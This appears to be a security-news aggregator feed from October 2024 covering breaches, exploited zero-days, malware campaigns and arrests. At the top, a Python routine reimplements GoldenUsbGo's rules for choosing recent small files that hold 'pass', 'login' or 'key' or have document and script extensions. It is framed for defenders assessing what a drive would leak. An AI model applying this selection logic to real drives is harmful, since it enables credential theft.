        Autosummary: Code comparison between GoldenUsbCopy and GoldenDealer Source: ESET GoldenUsbGo no longer uses AES-encrypted configuration but instead exfiltrates files based on hardcoded instructions, including recently (up to 14 days) modified files that are smaller than 20 MB and match specific types of content (keywords like "pass", "login", or "key") or certain file types (.pdf, .doc/.docx, .sh, .bat). "
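        The selection rules ESET quotes for GoldenUsbGo are concrete enough to reproduce, which is useful for two things a defender wants to know: what a given removable drive would have leaked, and what a staged collection on a compromised host would look like. The following is an added example, not code from ESET's report or from the GoldenJackal toolset. It walks a directory tree the way a USB stick would be walked and returns the files that satisfy the rules quoted above (modified within 14 days, smaller than 20 MB, and either containing "pass", "login" or "key" or carrying one of the listed extensions). The function names, the sample files, the 20 MiB reading of "20 MB" and the choice to search only the first 1 MiB of each file for keywords are our assumptions, not details from the report.

```python
"""Reimplementation of the GoldenUsbGo file-selection rules quoted in the
text (added example; not ESET's code and not the implant's). Everything not
stated in the quote, in particular the 1 MiB keyword-scan window, the MiB
reading of "20 MB", the function names and the sample files, is assumed."""
from __future__ import annotations

import os
import tempfile
import time
from pathlib import Path

MAX_AGE_SECONDS = 14 * 24 * 3600                 # "recently (up to 14 days) modified"
MAX_SIZE_BYTES = 20 * 1024 * 1024                # "smaller than 20 MB" (assumed MiB)
CONTENT_KEYWORDS = (b"pass", b"login", b"key")   # keywords quoted in the text
TARGET_SUFFIXES = {".pdf", ".doc", ".docx", ".sh", ".bat"}  # file types quoted
SCAN_PREFIX = 1024 * 1024                        # assumption: only the first 1 MiB is searched


def matches_content(path: Path) -> bool:
    """Case-insensitive keyword search over the start of the file."""
    try:
        with path.open("rb") as fh:
            head = fh.read(SCAN_PREFIX).lower()
    except OSError:
        return False
    return any(word in head for word in CONTENT_KEYWORDS)


def would_collect(path: Path, now: float | None = None) -> bool:
    """Apply the quoted rules to one path: the age and size gates come first,
    then extension or content. Unreadable paths count as not collected."""
    now = time.time() if now is None else now
    try:
        st = path.stat()
    except OSError:
        return False
    if not path.is_file():
        return False
    if st.st_size >= MAX_SIZE_BYTES:
        return False
    if now - st.st_mtime > MAX_AGE_SECONDS:
        return False
    return path.suffix.lower() in TARGET_SUFFIXES or matches_content(path)


def collect_candidates(root: str | os.PathLike, now: float | None = None) -> list[str]:
    """Walk `root` (for instance a mounted USB stick) and return the relative
    paths the rules would pick up, sorted so the output is stable."""
    root = Path(root)
    hits = [p for p in root.rglob("*") if would_collect(p, now)]
    return sorted(os.path.relpath(p, root) for p in hits)


def build_sample_drive(base: str | os.PathLike) -> None:
    """Constructed sample tree standing in for a USB stick (not real data)."""
    base = Path(base)
    base.mkdir(parents=True, exist_ok=True)
    (base / "report.pdf").write_bytes(b"%PDF-1.4 quarterly numbers")   # hit: extension
    (base / "notes.txt").write_bytes(b"vpn LOGIN: alice / hunter2")    # hit: keyword
    (base / "photo.jpg").write_bytes(b"\xff\xd8\xff nothing of note")    # miss: no rule fires
    stale = base / "deploy.sh"                                          # miss: older than 14 days
    stale.write_bytes(b"#!/bin/sh\necho hi\n")
    month_ago = time.time() - 30 * 24 * 3600
    os.utime(stale, (month_ago, month_ago))
    with (base / "keys.docx").open("wb") as fh:                         # miss: at the size cap
        fh.truncate(MAX_SIZE_BYTES)   # sparse file of exactly 20 MiB


def demo() -> list[str]:
    """Build the sample drive in a temporary directory and run the rules."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_drive(tmp)
        return collect_candidates(tmp)


if __name__ == "__main__":
    for rel in demo():
        print(rel)
```

Running it against the constructed drive returns only notes.txt (keyword hit) and report.pdf (extension hit); the stale script and the 20 MiB document fall to the age and size gates even though both carry a targeted extension. Point `collect_candidates` at a real mount point to get the same answer for an actual drive.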


        Exposing the Facebook funeral livestream scam (Lock and Code S05E21)

        financial
        2024-10-08 https://www.malwarebytes.com/blog/podcast/2024/10/exposing-the-facebook-funeral-livestream-scam-lock-and-code-s05e21
        This week on the Lock and Code podcast, we speak with Zach Hinkle and Pieter Arntz about the Facebook funeral livestream scam. "

        Autosummary: Show notes and credits: Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 4.0 License http://creativecommons.org/licenses/by/4.0/ Outro Music: “Good God” by Wowa (unminus.com) Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it. "


        Ivanti fixes three CSA zero-days exploited in the wild (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)

        exploits
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/cve-2024-9379-cve-2024-9380-cve-2024-9381/

        Ivanti has patched three additional Cloud Service Appliance (CSA) zero-day flaws, which have been exploited by attackers in conjunction with a zero-day bug the company accidentally fixed in September. The fixed zero-days: “We are aware of a limited number of customers running CSA 4.6 patch 518 and prior who have been exploited when CVE-2024-9379, CVE-2024-9380 or CVE-2024-9381 are chained with CVE-2024-8963,” the company announced on Tuesday. CVE-2024-8963 is a path traversal vulnerability that allows a … More

        The post Ivanti fixes three CSA zero-days exploited in the wild (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381) appeared first on Help Net Security.

        "

        Autosummary: Now, it seems three more have been added to the mix:
        CVE-2024-9379 – an SQL injection flaw that can be triggered by a remote authenticated attacker with admin privileges
        CVE-2024-9380 – an OS command injection vulnerability that allows a remote authenticated attacker with admin privileges to achieve remote code execution
        CVE-2024-9381 – a path traversal vulnerability that allows a remote authenticated attacker with admin privileges to bypass restrictions
        The “limited exploitation” of these vulnerabilities Ivanti says it observed was limited to CSA 4.6 patch 518 and below; CVE-2024-9379, CVE-2024-9380 and CVE-2024-9381 were discovered while the company investigated the initial attacks. "


        Zero-Day Alert: Three Critical Ivanti CSA Vulnerabilities Actively Exploited

        exploits
        2024-10-08 https://thehackernews.com/2024/10/zero-day-alert-three-critical-ivanti.html
        Ivanti has warned that three new security vulnerabilities impacting its Cloud Service Appliance (CSA) have come under active exploitation in the wild. The zero-day flaws are being weaponized in conjunction with another flaw in CSA that the company patched last month, the Utah-based software services provider said. Successful exploitation of these vulnerabilities could allow an authenticated "

        Autosummary: "


        Gamers Tricked Into Downloading Lua-Based Malware via Fake Cheating Script Engines

        exploits
        2024-10-08 https://thehackernews.com/2024/10/gamers-tricked-into-downloading-lua.html
        Users searching for game cheats are being tricked into downloading a Lua-based malware that is capable of establishing persistence on infected systems and delivering additional payloads. "These attacks capitalize on the popularity of Lua gaming engine supplements within the student gamer community," Morphisec researcher Shmuel Uzan said in a new report published today, adding "this malware "

        Autosummary: A majority of the attacks targeted users in Russia, followed by Belarus, India, Uzbekistan, Kazakhstan, Germany, Algeria, the Czech Republic, Mozambique, and Turkey. "


        New scanner finds Linux, UNIX servers exposed to CUPS RCE attacks

        Linux
        2024-10-08 https://www.bleepingcomputer.com/news/software/new-scanner-finds-linux-unix-servers-exposed-to-cups-rce-attacks/
        An automated scanner has been released to help security professionals scan environments for devices vulnerable to the Common Unix Printing System (CUPS) RCE flaw tracked as CVE-2024-47176. [...] "

        Autosummary: The scanner was created by cybersecurity researcher Marcus Hutchins (aka "MalwareTech") to help system administrators scan their networks and quickly identify devices running vulnerable cups-browsed services. "


        MoneyGram confirms customer data breach

        financial
        2024-10-08 https://www.malwarebytes.com/blog/news/2024/10/moneygram-confirms-customer-data-breach
        Money transfer giant MoneyGram has notified customers about a data breach that has spilt sensitive customer information. "

        Autosummary: Initial investigations show the type of information stolen varies between different individuals, but may include: Names; Contact information (phone number, email, physical address); Date of birth; Social Security Numbers; Government-issued identification documents (e.g. driver’s licenses); Other identification documents (e.g. utility bills); Bank account numbers; MoneyGram Plus Rewards numbers; Transaction information (such as dates and amounts of transactions); Criminal investigation information (such as fraud). MoneyGram says that only a limited number of customers’ Social Security numbers and criminal investigation information was taken. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


        Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572)

        exploits
        2024-10-08 https://www.helpnetsecurity.com/2024/10/08/cve-2024-43573-cve-2024-43572/

        For October 2024 Patch Tuesday, Microsoft has released fixes for 117 security vulnerabilities, including two under active exploitation: CVE-2024-43573, a spoofing bug affecting the Windows MSHTML Platform, and CVE-2024-43572, a remote code execution flaw in the Microsoft Management Console (MMC). About CVE-2024-43573 and CVE-2024-43572 As far as it can be deduced from the accompanying advisory, CVE-2024-43573 is similar to CVE-2024-38112, a vulnerability in MSHTML, a browser engine for the now deprecated Internet Explorer, which has … More

        The post Microsoft patches two zero-days exploited in the wild (CVE-2024-43573, CVE-2024-43572) appeared first on Help Net Security.

        "

        Autosummary: About CVE-2024-43573 and CVE-2024-43572 As far as it can be deduced from the accompanying advisory, CVE-2024-43573 is similar to CVE-2024-38112, a vulnerability in MSHTML, a browser engine for the now deprecated Internet Explorer, which has been expoited as a zero-day by the Void Banshee APT and patched by Microsoft in July 2024. "


        Brazil lifts ban on Musk’s X after it pays $5m fine

        latam
        2024-10-08 https://www.bbc.com/news/articles/c5y06vzk3yjo
        The country’s Supreme Court made the order after the platform also blocked certain accounts.

        Autosummary: "The decision to close X offices in Brazil was difficult," Musk, who also runs electric carmaker Tesla and rocket company SpaceX, wrote at the time.


        U.S. CISA adds Synacor Zimbra Collaboration flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-07 https://securityaffairs.com/169437/security/u-s-cisa-adds-synacor-zimbra-collaboration-flaw-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Zimbra Collaboration vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Zimbra Collaboration vulnerability CVE-2024-45519 (CVSS score of 10) to its Known Exploited Vulnerabilities (KEV) catalog. This week, Proofpoint cybersecurity researchers reported that threat actors are attempting to exploit a recently disclosed […]

        Autosummary: Pierluigi Paganini, October 07, 2024. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Zimbra Collaboration vulnerability to its Known Exploited Vulnerabilities catalog.


        THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

        ciber
        2024-10-07 https://thehackernews.com/2024/10/thn-cybersecurity-recap-top-threats-and.html
        Ever heard of a "pig butchering" scam? Or a DDoS attack so big it could melt your brain? This week’s cybersecurity recap has it all – government showdowns, sneaky malware, and even a dash of app store shenanigans. Get the scoop before it’s too late! ⚡ Threat of the Week Double Trouble: Evil Corp & LockBit Fall: A consortium of international law enforcement agencies took steps to arrest four

        Autosummary: As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." A Chinese nation-state actor known as Salt Typhoon penetrated the networks of U.S. broadband providers, including AT&T, Verizon, and Lumen, and likely accessed "information from systems the federal government uses for court-authorized network wiretapping requests," The Wall Street Journal reported. A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges."


        Linux systems targeted with stealthy “Perfctl” cryptomining malware

        exploits Linux
        2024-10-07 https://www.helpnetsecurity.com/2024/10/07/perfctl-perfcc-cryptomining-linux/

        Thousands of Linux systems are likely infected with the highly elusive and persistent “perfctl” (or “perfcc”) cryptomining malware and many others still could be at risk of getting compromised, Aqua Security researchers revealed last week. “In all the attacks observed, the malware was used to run a cryptominer, and in some cases, we also detected the execution of proxy-jacking software,” they shared. “Perfctl” malware Though the actual cryptomining is performed by XMRIG Monero cryptomining software, … More

        The post Linux systems targeted with stealthy “Perfctl” cryptomining malware appeared first on Help Net Security.

        "

        Autosummary: The “perfctl” attack flow (Source: Aqua Security) The malware: Contains and uses an exploit to CVE-2021-4034 (aka PwnKit) to attempt to gain full root privileges Modifies existing scripts to ensure execution of the malware and suppression of mesg errors (that might point to malicious execution), and drops a binary that verifies the execution of main payload Copies itself from memory to half a dozen other locations (with file names that mimic the names of conventional system files) Drops a rootkit to hide its presence and assure persistence, alter network traffic, etc. "


        FBCS data breach impacted 238,000 Comcast customers

        financial
        2024-10-07 https://securityaffairs.com/169478/data-breach/fbcs-data-breach-impacted-238000-comcast-customers.html
        238,000 Comcast customers were impacted by the FBCS data breach following the February ransomware attack, Comcast reports. Telecommunications giant Comcast is notifying approximately 238,000 customers impacted by the Financial Business and Consumer Solutions (FBCS) data breach. FBCS, a third-party debt collection agency, collects personal information from its clients to facilitate debt collection activities on behalf […]

        Autosummary: Pierluigi Paganini, October 07, 2024. 238,000 Comcast customers were impacted by the FBCS data breach following the February ransomware attack, Comcast reports. According to the agency, compromised information may include names, dates of birth, Social Security numbers, and account information.


        American Water shuts down online services after cyberattack

        ciber
        2024-10-07 https://www.bleepingcomputer.com/news/security/american-water-shuts-down-online-services-after-cyberattack/
        American Water, the largest publicly traded U.S. water and wastewater utility company, was forced to shut down some of its systems after a Thursday cyberattack. [...]


        Kyiv’s hackers launched an unprecedented cyber attack on Russian state media VGTRK on Putin’s birthday

        government rusia-ucrania
        2024-10-07 https://securityaffairs.com/169486/cyber-warfare-2/kyivs-hackers-hit-russian-state-media.html
        Russian state media VGTRK faced a major cyberattack, which a Ukrainian source claimed was conducted by Kyiv’s hackers. A Ukrainian government source told Reuters that Kyiv’s hackers are behind the cyber attack that disrupted operations at the Russian state media company VGTRK on Putin’s birthday. The All-Russia State Television and Radio Broadcasting Company (VGTRK, Russian: […]

        Autosummary: Pierluigi Paganini, October 07, 2024. Russian state media VGTRK faced a major cyberattack, which a Ukrainian source claimed was conducted by Kyiv’s hackers.


        LEGO’s website hacked to push cryptocurrency scam

        financial
        2024-10-07 https://www.bleepingcomputer.com/news/security/legos-website-hacked-to-push-cryptocurrency-scam/
        On Friday night, cryptocurrency scammers briefly hacked the LEGO website to promote a fake Lego token that could be purchased with Ethereum. [...]

        Autosummary: According to LEGO Reddit moderator "mescad," the breach took place at 9 PM EST and lasted approximately 75 minutes until 10:15 PM ET, when the site was restored.


        Ukrainian pleads guilty to operating Raccoon Stealer malware

        exploits
        2024-10-07 https://www.bleepingcomputer.com/news/security/ukrainian-pleads-guilty-to-operating-raccoon-stealer-malware/
        Ukrainian national Mark Sokolovsky has pleaded guilty to his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation. [...]

        Autosummary: "While an exact number has yet to be verified, FBI agents have identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data from what appears to be millions of potential victims around the world," the Department of Justice said in a press release at the time.


        Qualcomm patches high-severity zero-day exploited in attacks

        exploits
        2024-10-07 https://www.bleepingcomputer.com/news/security/qualcomm-patches-high-severity-zero-day-exploited-in-attacks/
        Qualcomm has released security patches for a zero-day vulnerability in the Digital Signal Processor (DSP) service that impacts dozens of chipsets. [...]

        Autosummary: In recent years, Qualcomm has also patched chipset vulnerabilities that could allow attackers to access users’ media files, text messages, call history, and real-time conversations.


        Comcast and Truist Bank customers impacted by debt collector’s breach

        financial
        2024-10-07 https://www.malwarebytes.com/blog/news/2024/10/comcast-and-truist-bank-customers-impacted-by-debt-collectors-breach
        A data breach at a US debt collection agency has led to the loss of data of some Comcast and Truist Bank customers.

        Autosummary: The data breach occurred in February 2024 and the cybercriminals responsible for the incident gained access to: Full names; Social Security Numbers (SSNs); Date of birth; Account information and other provider information; ID card and/or driver’s license; Other state identification number; Medical claims information; Clinical information (including diagnosis/conditions, medications, and other treatment information), and/or health insurance information.


        Universal Music data breach impacted 680 individuals

        financial
        2024-10-07 https://securityaffairs.com/169502/data-breach/universal-music-group-data-breach.html
        Universal Music Group notified hundreds of individuals about a data breach compromising their personal information. Universal Music Group is notifying 680 individuals about a data breach that compromised their personal information, including their Social Security number. The data breach occurred on July 15, 2024, and was discovered on August 30, 2024. “In early July, we detected […]

        Autosummary: Pierluigi Paganini, October 07, 2024. Universal Music Group notified hundreds of individuals about a data breach compromising their personal information.


        MoneyGram confirms hackers stole customer data in cyberattack

        financial ciber
        2024-10-07 https://www.bleepingcomputer.com/news/security/moneygram-confirms-hackers-stole-customer-data-in-cyberattack/
        MoneyGram has confirmed that hackers stole customers’ personal information and transaction data in a September cyberattack that caused a five-day outage. [...]


        Week in review: Critical Zimbra RCE vulnerability exploited, Patch Tuesday forecast

        exploits
        2024-10-06 https://www.helpnetsecurity.com/2024/10/06/week-in-review-critical-zimbra-rce-vulnerability-exploited-patch-tuesday-forecast/

        Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: October 2024 Patch Tuesday forecast: Recall can be recalled October arrived, and Microsoft started the month by announcing the release of Windows 11 24H2. The preview versions of this release have been in the news due to many innovations and one controversial feature. Critical Zimbra RCE vulnerability under mass exploitation (CVE-2024-45519) Attackers are actively exploiting CVE-2024-45519, a critical Zimbra vulnerability … More

        The post Week in review: Critical Zimbra RCE vulnerability exploited, Patch Tuesday forecast appeared first on Help Net Security.

        "

        Autosummary: Infosec products of the month: September 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Absolute, anecdotes, ArmorCode, Binarly, Bitdefender, Druva, F5 Networks, Gcore, Guardsquare, Huntress, Ketch, LOKKER, Malwarebytes, NETGEAR, Nudge Security, Prompt Security, Rapid7, Revenera, Skyhigh Security, Strivacity, Tenable, Trellix, Vanta, Veritas Technologies, and Wing Security. New infosec products of the week: October 4, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Balbix, Halcyon, Metomic, Red Sift, SAFE Security, Veeam Software, and Legit Security. "


        Comcast and Truist Bank customers caught up in FBCS data breach

        financial
        2024-10-06 https://www.bleepingcomputer.com/news/security/comcast-and-truist-bank-customers-caught-up-in-fbcs-data-breach/
        Comcast Cable Communications and Truist Bank have disclosed they were impacted by a data breach at FBCS, and are now informing their respective customers that their data has been compromised. [...]

        Autosummary: Last April this year, FBCS informed of a data breach determined to have occurred between February 14 and February 26, 2024, when threat actors breached its network and stole the following details from its electronic records: Full name; Social Security Number (SSN); Date of birth; Account information; Driver’s license number or ID card. The data breach was initially believed to have impacted 1.9 million people, but subsequent findings upped the tally to 3.2 million in June and, finally, 4.2 million individuals in July.


        SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 14

        exploits
        2024-10-06 https://securityaffairs.com/169427/malware/security-affairs-malware-newsletter-round-14.html
        Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Rhadamanthys Stealer Adds Innovative AI Feature in Version 0.7.0 Threat Actors leverage Docker Swarm and Kubernetes to […]


        Apple Releases Critical iOS and iPadOS Updates to Fix VoiceOver Password Vulnerability

        exploits
        2024-10-05 https://thehackernews.com/2024/10/apple-releases-critical-ios-and-ipados.html
        Apple has released iOS and iPadOS updates to address two security issues, one of which could have allowed a user’s passwords to be read out aloud by its VoiceOver assistive technology. The vulnerability, tracked as CVE-2024-44204, has been described as a logic problem in the new Passwords app impacting a slew of iPhones and iPads. Security researcher Bistrit Daha has been credited with


        Apple iOS 18.0.1 and iPadOS 18.0.1 fix media session and passwords bugs

        exploits
        2024-10-05 https://securityaffairs.com/169381/mobile-2/apple-ios-18-0-1.html
        Apple released iOS 18.0.1 update that addressed two vulnerabilities that exposed passwords and audio snippets to attackers. Apple released iOS 18.0.1 and iPadOS 18.0.1 updates to fix two vulnerabilities, respectively tracked as CVE-2024-44207 and CVE-2024-44204. The company addressed the vulnerability by improving checks. The flaw was reported by Michael Jimenez and an anonymous researcher. The […]


        MoneyGram: No evidence ransomware is behind recent cyberattack

        financial exploits ransomware ciber
        2024-10-05 https://www.bleepingcomputer.com/news/security/moneygram-no-evidence-ransomware-is-behind-recent-cyberattack/
        MoneyGram says there is no evidence that ransomware is behind a recent cyberattack that led to a five-day outage in September. [...]

        Autosummary: "After working with leading external cybersecurity experts, including CrowdStrike, and coordinating with U.S. law enforcement, the majority of our systems are now operational, and we have resumed money transfer services," says an email obtained by BleepingComputer.


        Outlast game development delayed after Red Barrels cyberattack

        ciber
        2024-10-04 https://www.bleepingcomputer.com/news/security/outlast-game-development-delayed-after-red-barrels-cyberattack/
        Canadian video game developer Red Barrels is warning that the development of its Outlast games will likely be delayed after the company suffered a cyberattack impacting its internal IT systems and data. [...]

        Autosummary: "The Red Barrels team regrets to announce that its internal IT systems were recently impacted by a cybersecurity event, involving access to some of its data," reads a statement on Red Barrels’ website.


        UK nuclear site Sellafield fined $440,000 for cybersecurity shortfalls

        ciber
        2024-10-04 https://www.bleepingcomputer.com/news/security/uk-nuclear-site-sellafield-fined-440-000-for-cybersecurity-shortfalls/
        Nuclear waste processing facility Sellafield has been fined £332,500 ($440k) by the Office for Nuclear Regulation (ONR) for failing to adhere to cybersecurity standards and putting sensitive nuclear information at risk over four years, from 2019 to 2023. [...]

        Autosummary: The site is involved in retrieving nuclear waste, fuel, and sludge from legacy ponds and silos, storing radioactive materials such as plutonium and uranium, managing spent nuclear fuel rods, and remediating and decommissioning nuclear facilities.


        Sellafield nuclear site hit with £332,500 fine after “significant cybersecurity shortfalls”

        ciber
        2024-10-04 https://www.bitdefender.com/blog/hotforsecurity/sellafield-nuclear-site-332500-fine-cybersecurity-shortfalls/
        The UK’s Sellafield nuclear waste processing and storage site has been fined £332,500 by regulators after its IT systems were found to have been left vulnerable to hackers and unauthorised access for years. Read more in my article on the Hot for Security blog.


        100+ domains seized to stymie Russian Star Blizzard hackers

        rusia-ucrania
        2024-10-04 https://www.helpnetsecurity.com/2024/10/04/star-blizzard-domains-seized/

        Microsoft and the US Justice Department have seized over 100 domains used by Star Blizzard, a Russian nation-state threat actor. “Between January 2023 and August 2024, Microsoft observed Star Blizzard target over 30 civil society organizations – journalists, think tanks, and non-governmental organizations (NGOs) core to ensuring democracy can thrive – by deploying spear-phishing campaigns to exfiltrate sensitive information and interfere in their activities,” Steven Masada, Assistant General Counsel at Microsoft’s Digital Crimes Unit, explained. … More

        The post 100+ domains seized to stymie Russian Star Blizzard hackers appeared first on Help Net Security.

        "

        Autosummary: "


        Cybercriminals capitalize on poorly configured cloud environments

        ciber
        2024-10-04 https://www.helpnetsecurity.com/2024/10/04/cloud-environments-attack-surface/

        Off-the-shelf offensive security tools and poorly configured cloud environments create openings in the attack surface, according to Elastic. Adversaries are utilizing off-the-shelf tools Offensive security tools (OSTs), including Cobalt Strike and Metasploit, made up ~54% of observed malware alerts. The most prevalent malware family observed this year was Cobalt Strike, accounting for 27.02% of infections. Cobalt Strike is a very mature commercial post-exploitation framework with an experienced research and development team. It is so effective … More

        The post Cybercriminals capitalize on poorly configured cloud environments appeared first on Help Net Security.

        "

        Autosummary: Malware families such as Gafgyt (3.12%), Mirai (2.09%), and Bedevil (1.84%) appeared less often than in prior years, which may be a reflection of attempts to neutralize botnets from propagating. "


        U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

        rusia-ucrania
        2024-10-04 https://thehackernews.com/2024/10/us-and-microsoft-seize-107-russian.html
        Microsoft and the U.S. Department of Justice (DoJ) on Thursday announced the seizure of 107 internet domains used by state-sponsored threat actors with ties to Russia to facilitate computer fraud and abuse in the country. "The Russian government ran this scheme to steal Americans’ sensitive information, using seemingly legitimate email accounts to trick victims into revealing account credentials


        New Perfctl Malware targets Linux servers in cryptomining campaign

        exploits Linux
        2024-10-04 https://securityaffairs.com/169351/malware/perfctl-malware-targets-misconfigured-linux-servers.html
        perfctl malware targets misconfigured Linux servers to deploy cryptocurrency miners and proxyjacking software in an ongoing campaign. Aqua Nautilus researchers shed light on a Linux malware, dubbed perfctl malware, that over the past 3-4 years targeted misconfigured Linux servers. The malicious code was used to drop cryptocurrency miners and proxyjacking software. Perfctl is an elusive […]

        Autosummary: This data includes host events, locations of the copies of itself, process names, communication logs, tokens, and additional log information. Pierluigi Paganini, October 04, 2024. perfctl malware targets misconfigured Linux servers to deploy cryptocurrency miners and proxyjacking software in an ongoing campaign.


        Highline Public Schools confirms ransomware behind shutdown

        exploits ransomware
        2024-10-04 https://www.bleepingcomputer.com/news/security/highline-public-schools-confirms-ransomware-attack-was-behind-september-shut-down/
        On Thursday, K-12 school district Highline Public Schools confirmed that a ransomware attack forced it to shut down all schools in early September. [...]

        Autosummary: "In response, a third-party cybersecurity forensic specialist was engaged, and an investigation was launched, which confirmed that the unauthorized activity was a form of ransomware," the school district said this week.


        Ransomware activity shows no signs of slowing down

        exploits
        2024-10-03 https://www.helpnetsecurity.com/2024/10/03/ransomware-incidents-rise-video/

        Ransomware attacks have seen a significant resurgence, disrupting multiple sectors and affecting global supply chains. Despite efforts to disrupt major ransomware groups, incidents continue to rise, signaling an ongoing and growing threat into 2024. In this Help Net Security round-up, industry experts discuss the rise in ransomware attacks, their impact on critical systems like Microsoft Active Directory, and the growing resilience of the threat despite ongoing mitigation efforts. Craig Birch, Technology Evangelist, and Principal Security … More

        The post Ransomware activity shows no signs of slowing down appeared first on Help Net Security.

        "

        Autosummary: "


        Six migrants die after Mexico soldiers open fire

        latam
        2024-10-03 https://www.bbc.com/news/articles/c3e9p5j1yelo
        Officials say the incident happened after a military patrol saw a vehicle carrying 33 migrants travelling at speed.

        Autosummary: Thousands of migrants enter Mexico every year hoping to reach the US. Soldiers reported hearing explosions after which two officers opened fire, the statement said, adding they have been removed from their duties while an investigation is carried out.


        AuthenticID Velocity Checks detects fraudulent activities

        government
        2024-10-03 https://www.helpnetsecurity.com/2024/10/03/authenticid-velocity-checks/

        AuthenticID released Velocity Checks, a new tool that integrates with its comprehensive identity verification and fraud prevention platform. The solution leverages biometric and document analysis to detect multiple identities for fraudulent activities in real-time. Fraudsters can use different names with the same image so that identical visual data (like headshots or biometric information) is paired with multiple identity documents or account registrations with differing names. Velocity Checks uses sophisticated image comparison algorithms to analyze ID … More

        The post AuthenticID Velocity Checks detects fraudulent activities appeared first on Help Net Security.

        "

        Autosummary: "


        Spotting AI-generated scams: Red flags to watch for

        financial
        2024-10-03 https://www.helpnetsecurity.com/2024/10/03/andrius-popovas-mano-bank-ai-fraud/

        In this Help Net Security interview, Andrius Popovas, Chief Risk Officer at Mano Bank, discusses the most prevalent AI-driven fraud schemes, such as phishing attacks and deepfakes. He explains how AI manipulates videos and audio to deceive victims and highlights key red flags to watch for. Popovas also outlines strategies for professionals to stay ahead of these scams and the role of governments in combating AI fraud. What types of AI-driven fraud schemes are most … More

        The post Spotting AI-generated scams: Red flags to watch for appeared first on Help Net Security.

        "

        Autosummary: If lighting looks off, with harsh contrasts or mismatched shadows, it could be a sign of manipulation), blurriness (Edges, where the face is swapped, may appear blurred, distorted, or pixelated, especially if the transition between the fake and real parts is not smooth), audio anomalies (If the voice sounds robotic, lacks emotion, or doesn’t match the speaking style of the person being imitated, it could be a fake). Therefore, if you receive a video or audio call, you need to pay attention to these red flags: strange facial movements (Look for unnatural expressions, mismatched lip movements, or awkward eye movement), inconsistent lighting (Natural videos typically have consistent lighting across a scene. "


        "It kills everything" - Amazon’s indigenous people hit by record forest fires in Brazil

        latam
        2024-10-03 https://www.bbc.com/news/articles/cvgxv8n7wd0o
        More than 62,000 sq km of rainforest has burned in Brazil, this year alone.

        Autosummary: The indigenous chief, Zé Bajaga, says that the majority of these fires are arson, set by people who “no longer want the wellbeing of humanity, or nature”. Most fires here are illegally started by humans, according to scientists, the Federal Police, and the government: loggers and miners looking to exploit land in the Amazon, or farmers turning it into pasture. Dorismar Luiz Baruffi says there is still a lot of land to be cultivated in the Amazonas. At the heart of his, and others’, argument is the belief more land should be productive, not just protected. Zé Bajaga, an indigenous chief, says a lot of the fires are caused by arson. In recent years, deforestation has slowed in the Amazon.


        INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa

        financial
        2024-10-03 https://thehackernews.com/2024/10/interpol-arrests-8-in-major-phishing.html
        INTERPOL has announced the arrest of eight individuals in Côte d’Ivoire and Nigeria as part of a crackdown on phishing scams and romance cyber fraud. Dubbed Operation Contender 2.0, the initiative is designed to tackle cyber-enabled crimes in West Africa, the agency said. One such threat involved a large-scale phishing scam targeting Swiss citizens that resulted in financial losses to the tune

        Autosummary: Adeagbo "conspired with others to participate in multiple cyber-enabled BEC schemes that defrauded a North Carolina university of more than $1.9 million, and attempted to steal more than $3 million from victim entities in Texas, including local government entities, construction companies, and a Houston-area college," the DoJ said.


        LockBit Ransomware and Evil Corp Members Arrested and Sanctioned in Joint Global Effort

        exploits ransomware
        2024-10-03 https://thehackernews.com/2024/10/lockbit-ransomware-and-evil-corp.html
        A new wave of international law enforcement actions has led to four arrests and the takedown of nine servers linked to the LockBit (aka Bitwise Spider) ransomware operation, marking the latest salvo against what was once a prolific financially motivated group. This includes the arrest of a suspected LockBit developer in France while on holiday outside of Russia, two individuals in the U.K. who

        Autosummary: In conjunction, authorities outed a Russian national named Aleksandr Ryzhenkov (aka Beverley, Corbyn_Dallas, G, Guester, and Kotosel) as one of the high-ranking members of the Evil Corp cybercrime group, while simultaneously painting him as a LockBit affiliate.


        Linux malware “perfctl” behind years-long cryptomining campaign

        exploits Linux
        2024-10-03 https://www.bleepingcomputer.com/news/security/linux-malware-perfctl-behind-years-long-cryptomining-campaign/
        A Linux malware named "perfctl" has been targeting Linux servers and workstations for at least three years, remaining largely undetected through high levels of evasion and the use of rootkits. [...]

        Autosummary: Additional userland rootkits are also deployed, replacing the ldd, top, crontab, and lsof utilities with trojanized versions, again, preventing direct detection of the malware’s activities. Detecting and stopping perfctl Aqua Nautilus proposes several ways for detecting and stopping perfctl, which fall into four main categories: system monitoring, network traffic analysis, file and process integrity monitoring, and proactive mitigation.


        Browser Guard now flags data breaches and better protects personal data

        financial
        2024-10-03 https://www.malwarebytes.com/blog/personal/2024/10/browser-guard-now-flags-data-breaches-and-better-protects-personal-data
